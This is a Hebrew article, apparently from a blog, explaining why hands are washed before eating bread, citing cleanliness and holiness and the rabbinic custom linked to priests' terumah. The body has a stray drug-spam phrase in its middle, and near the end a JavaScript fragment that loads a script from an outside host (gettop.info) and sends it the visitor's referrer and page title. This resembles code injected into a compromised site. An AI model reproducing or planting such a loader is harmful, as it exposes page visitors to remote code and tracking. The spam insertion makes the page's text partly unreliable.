מדוע נוטלים ידיים דווקא כאשר אוכלים לחם ?

כידוע, יש שתי סיבות עיקריות לעצם החיוב לנטילת ידיים

האחת משום “נקיות וקדושה”  והשניה משום “סרך תרומה”

נקיות וקדושה

מטרת האכילה בעם ישראל אינה כשאר העמים  –  רק להשביע את הגוף   אלא היא גם דרך בה עובד האדם את הקב”ה ע”י שהוא אוכל בצניעות ולא בתאוותנות ובכך משתלט על יצרו ומתעלה בקדושה

אחד הסימנים החיצוניים של קדושה וטהרה הוא הנקיות  ואת  הנקיות אנו תמיד משיגים ע”י מים ולכן תיקנו חז”ל נטילת ידיים

סרך תרומה

vivace 5mg

בתקופה אשר בה היו הכהנים אוכלים “תרומה” הצריכו אותם חכמים ליטול ידיהם קודם לכן וזאת כדי שלא יטמאו אותה בנגיעתם, וכדי שיהיו הכהנים רגילים לעשות כן תיקנו חכמים שכל אדם האוכל פת יטול ידיו קודם לכן.

לאחר שהסברנו מדוע בכלל יש ליטול ידיים נעסוק בשאלה שלנו:  מדוע דווקא לפני אכילת לחם?

כפי שראינו לעיל  , אנו נוטלים ידיים מפני “סרך תרומה” (כדי שהכהנים לא יאכלו תרומה עם ידיים טמאות) ומאחר ורוב התרומה באה (מן התורה)  ממיני דגן  אשר מהם עושים לחם,  אנו נוטלים דווקא לפני אכילת לחם

סיבה נוספת היא משום שסעודה של פת יש לה קביעות (היא סעודה חשובה) ו סעודות שאין בהם פת אין להן בדרך כלל   קביעות וחשיבות , ולכן נוטלים דווקא ללחם

שאלת השאלות

בזמננו , הכהנים לא אוכלים “תרומה” (כי יש לאוכלה בטהרה ועדיין כולנו טמאי מת) ואם כן מדוע יש ליטול ידיים?

תשובה 

למרות שהכהנים כיום עדיין לא ניטהרו מטומאת מת (אשר לצורך כך יש להשתמש בפרה אדומה טהורה שאין לנו) לא ביטלו חז”ל את את תקנת נטילת ידיים  וזאת  כדי  שנתרגל לאכול רק כאשר  הידיים טהורות וכאשר יבנה בית המקדש במהרה בימינו  ונוכל כבר לאכול תרומה לא יהיה הדבר חדש בשבילנו ונהיה כבר רגילים אליו

 

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’);

סגור לתגובות.

Scroll To Top